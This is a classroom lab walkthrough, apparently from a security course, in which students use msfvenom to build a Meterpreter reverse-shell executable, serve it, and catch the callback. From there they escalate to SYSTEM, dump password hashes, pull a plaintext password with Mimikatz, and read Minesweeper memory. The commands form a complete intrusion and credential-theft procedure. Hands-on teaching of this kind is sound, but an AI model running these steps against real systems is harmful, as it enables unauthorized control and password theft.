4.1: Mimikatz (15 pts. extra credit)

What You Need

Purpose

We will use Kali Linux and Metasploit to create a an infectious EXE file.

A user who runs that file surrenders control of their computer.

Finding the Attacker's IP Address

On your Linux machine, in a Terminal window, execute this command:
ifconfig
Find your IP address and make a note of it. In the example below, it is 172.16.1.203.

Using Msfvenom to Make a Malicious EXE

In Kali, execute this command to learn about msfvenom, which is part of Metasploit.
msfvenom -h
A help message appears, as shown below.

In Kali, execute these commands to create a malicious Windows executable file named "fun.exe" and serve it from a malicious Web server.

Adjust the IP address to match the IP address of your Kali machine (the C&C server).

msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.1.203 -f exe > /var/www/html/fun.exe
service apache2 start
The operation proceeds without errors, as shown below.

Troubleshooting

If msfvemon crashes on a line in the "android.rb" file, try editing that file and viewing that line. It may define a certificate that is valid for 20 years. Delete the "0" to make it valid for only 2 years to fix the error.

Another workaround is to use 64-bit Kali; msfvenom works better on that OS.

Launching Msfconsole

In Kali, execute this command to start msfconsole, the main control system for Metasploit.
msfconsole
Metasploit launches, as shown below.

In Kali, at the msf> prompt, execute this command.

help
Several pages of help scroll by. The section we'll use is "Module commands", as shown below.

Starting a Command-and-Control (C&C) Server

Execute these commands to start a C&C listener.
use multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 0.0.0.0
exploit
Metasploit starts a "reverse TCP handler", as shown below.

Putting a Password on the Target Machine

On the target Windows machine, click Start, "Control Panel", "User Accounts", "Change your Windows password", "Create a password for your account".

Enter a password of P@ssw0rd in both the password boxes, as shown below.

Click the "Create password" button.

Running the Malware on the Target Machine

On the target Windows machine, open a Web browser and open this URL, replacing the IP address with the IP address of your Kali machine:
http://172.16.1.203/fun.exe
The file "fun.exe" downloads. Bypass any warning boxes, double-click the file, and allow it to run.

Note: if you are using antivirus, you will need to disable it. You will also need to disable Windows Defender. If you have problems disabling your malware protection, use the Windows 2008 Server virtual machine, which has no malware protection.

On your Kali machine, a meterpeter session opens, as shown below.

Privilege Escalation and Stealing Password Hashes

On your Kali machine, at meterpreter > prompt, execute this command:
getuid
As shown below, we have Administrator privileges.

To steal the plaintext password from memory, we need to run as SYSTEM, which is more powerful than the Administrator account.

On your Kali machine, at meterpreter > prompt, execute these commands:

getsystem
getuid
"getuid" reports that you have SYSTEM privileges now, as shown below.

On your Kali machine, at meterpreter > prompt, execute this command:

hashdump
You see password hashes, as shown below.

Stealing a Plaintext Password

We could try to crack those hashes to get passwords, but that might be a lot of work.

Fortunately, Windows stores the password of the currently logged-on user in RAM in a reversibly encrypted form, so we can steal it directly :).

On your Kali machine, at meterpreter > prompt, execute these commands:

load mimikatz
kerberos
The plaintext password is revealed, as highlighted in the image below!

Winning at Minesweeper

On your host system, in a Web browser, go to

http://www.minesweeper.info/downloads/WinmineXP.html

Click DOWNLOAD. A Winmine__XP.exe file downloads.

Rename this file to winmine.exe

Drag the winmine.exe file into your Windows machine and run it, as shown below.

This is a game in which you must click on the empty squares, avoiding the squares that contain mines.

On your Kali machine, at meterpreter > prompt, execute these commands:

mimikatz_command -f winmine::infos
Mimikatz reads the locations of the mines from RAM and displays them, as shown below.

Play the game and win it, using the information from Mimikatz.

When you win, you see the screen below. Part of the message is redacted in the image below.

4.1 Recording Your Success

Use the form below to put your name on the WINNERS PAGE.
Your Name:
Message text:
Updated 5-23-18 to run as a CTF
Slight changes 6-4-18
Android.rb fix added 6-14-18